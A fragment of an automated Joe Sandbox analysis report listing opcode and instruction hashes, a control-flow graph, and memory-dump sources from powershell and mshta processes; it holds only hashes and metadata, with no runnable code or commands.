                                                                                                                      • Opcode ID: e048ca11dcfcc1c263d9363cefa5408d2735b647a47308ccee526d0d6908e5d7
                                                                                                                      • Instruction ID: 5d4cf4be0c5b9e2a6c0374ec093225f89ae915c57c5f7d507e1c51f5409efe21
                                                                                                                      • Opcode Fuzzy Hash: e048ca11dcfcc1c263d9363cefa5408d2735b647a47308ccee526d0d6908e5d7
                                                                                                                      • Instruction Fuzzy Hash: 52C1683090DBCA4FE74AA76C54116BA7FE2EF46744F1501EBD48EC71A3D618AC25C3A1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 219 7fe89a710d3-7fe89a710dc 220 7fe89a710ed-7fe89a71124 219->220 221 7fe89a710de-7fe89a710ec 219->221 222 7fe89a7112a-7fe89a7119e 220->222 223 7fe89a711c1-7fe89a711cb 220->223 221->220 233 7fe89a711a6-7fe89a711be 222->233 224 7fe89a711d8-7fe89a711e8 223->224 225 7fe89a711cd-7fe89a711d7 223->225 226 7fe89a711ea-7fe89a711ee 224->226 227 7fe89a711f5-7fe89a7121a 224->227 226->227 233->223
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.461518646.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b184e61f49b6b8dabf76f7c3b93ee0073512572fd00d4e64b9334736c50ebf93
                                                                                                                      • Instruction ID: 930e00c091da4303cd386d337dc8bb3a23aa621aab579a79d62e1030b716a6d5
                                                                                                                      • Opcode Fuzzy Hash: b184e61f49b6b8dabf76f7c3b93ee0073512572fd00d4e64b9334736c50ebf93
                                                                                                                      • Instruction Fuzzy Hash: 3141B41160DBC90FE347937C1864264BFE1EF4B255B2911EBD48ECB1A3E9099C6AC361
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.461518646.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9a2d548bce9fc48c4e5e67f405e8e16440f15c20978c6cd1e274f6cd47e0d259
                                                                                                                      • Instruction ID: 4b2f35a698701367247b36288eb80d7ac4651559310c38927e304224651aa5df
                                                                                                                      • Opcode Fuzzy Hash: 9a2d548bce9fc48c4e5e67f405e8e16440f15c20978c6cd1e274f6cd47e0d259
                                                                                                                      • Instruction Fuzzy Hash: B0A1362080EBC91FD747A778A8142A63FF1EF47254F1A01EBD48DCB1A3D6199D1AC362
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.484335909.0000000003290000.00000010.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_3290000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction ID: 1a94b133b30e0d8eb7574468eda1d4598df7cf8fa14fda9190fdd2dbbb0f4b2e
                                                                                                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.484335909.0000000003290000.00000010.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_3290000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction ID: 1a94b133b30e0d8eb7574468eda1d4598df7cf8fa14fda9190fdd2dbbb0f4b2e
                                                                                                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction Fuzzy Hash: